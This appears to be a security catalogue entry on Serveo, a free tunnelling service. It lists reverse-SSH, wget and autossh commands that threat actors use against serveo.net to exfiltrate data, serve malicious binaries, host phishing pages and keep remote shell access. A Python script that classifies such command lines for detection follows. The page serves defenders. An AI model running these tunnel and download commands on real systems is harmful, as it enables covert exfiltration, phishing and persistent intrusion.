.. /Serveo

Exfiltration
Download
Phishing
Shell Access

Serveo is a free online alternative to ngrok. Insiders as well as threat actors can use it to expose local systems and services over the internet for data exfiltration, downloading malicious software, and hosting phishing pages.

Paths:

Resources:

Acknowledgements:

Detections:

Exfiltration

  1. The command creates a tunnel via Serveo to the local port provided in the command. The port can belong to a local service or a web server running locally.

    ssh -R <PORT>:localhost:<PORT> serveo.net
    Use case: Exposing local services/file system over the internet for data exfiltration.
    Privileges required: User
    Operating systems: Windows, Mac, Linux

Download

  1. Threat actors can host malicious binaries on the local system, expose them via serveo.net, and have them downloaded on the compromised host.

    wget *.serveo.net
    Use case: Serving malicious binaries to be executed/downloaded on the compromised host.
    Privileges required: User
    Operating systems: Windows, Mac, Linux

Phishing

  1. Threat actors can host phishing sites locally and expose them via serveo.net to compromise users.

    ssh -R <PORT>:localhost:<PORT> serveo.net
    Use case: Hosting a phishing site locally and exposing it via serveo.net.
    Privileges required: User
    Operating systems: Windows, Mac, Linux

Shell Access

  1. Threat actors can establish persistence on the compromised host so that the system automatically reconnects to serveo.net, and can also provide shell access by exposing SSH/RDP etc.

    autossh -M 0 -R <PORT>:localhost:<PORT> serveo.net
    Use case: Persisting local connections over serveo.net and/or exposing SSH/RDP for persistence.
    Privileges required: User
    Operating systems: Windows, Mac, Linux
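
For defenders, the command shapes listed in the four sections above can be matched in process-creation telemetry. The following is an added example, not part of the original entry or the project's own detections: the function names and finding labels are hypothetical, the `curl` coverage is an assumption beyond the `wget` form shown on the page, and the sample command lines are constructed.

```python
import re
import shlex

def host_of(token):
    """Reduce an argument or URL to its bare lowercase host name."""
    t = re.sub(r"^[a-z][a-z0-9+.-]*://", "", token, flags=re.I)  # drop scheme
    t = t.split("/", 1)[0]                # drop path
    t = t.rsplit("@", 1)[-1]              # drop user@
    return t.split(":", 1)[0].lower()     # drop :port

def is_serveo(token):
    # Exact suffix match so look-alikes such as notserveo.net.example.org fail
    h = host_of(token)
    return h == "serveo.net" or h.endswith(".serveo.net")

def classify(cmdline):
    """Return a finding label for one process command line, or None."""
    try:
        # posix=False keeps Windows backslashes in the executable path intact
        argv = shlex.split(cmdline, posix=False)
    except ValueError:                    # unbalanced quotes: split on spaces
        argv = cmdline.split()
    argv = [a.strip("\"'") for a in argv]
    if not argv or not any(is_serveo(a) for a in argv[1:]):
        return None
    exe = argv[0].replace("\\", "/").rsplit("/", 1)[-1].lower()
    exe = re.sub(r"\.exe$", "", exe)
    # Matches "-R" and the attached form "-R<spec>"; other spellings of a
    # remote forward (e.g. via ssh_config) are outside this sketch
    reverse = any(a.startswith("-R") for a in argv[1:])
    if exe == "autossh" and reverse:
        return "persistent-reverse-tunnel"
    if exe == "ssh" and reverse:
        return "reverse-tunnel"
    if exe in ("wget", "curl"):
        return "download"
    return "serveo-reference"

# Constructed sample command lines (not taken from real telemetry)
SAMPLE = [
    "ssh -R 8080:localhost:8080 serveo.net",
    r"C:\Windows\System32\OpenSSH\ssh.exe -R 80:localhost:3000 serveo.net",
    "autossh -M 0 -R 2222:localhost:22 serveo.net",
    "wget https://example-sub.serveo.net/tool.bin",
    "ssh -L 5432:db.internal:5432 bastion.example.org",
    "wget https://notserveo.net.example.org/index.html",
]

if __name__ == "__main__":
    for line in SAMPLE:
        print(f"{classify(line) or '-':26} {line}")
```

Command-line matching only covers hosts that log process creation; DNS or proxy logs for `serveo.net` and its subdomains cover the network side.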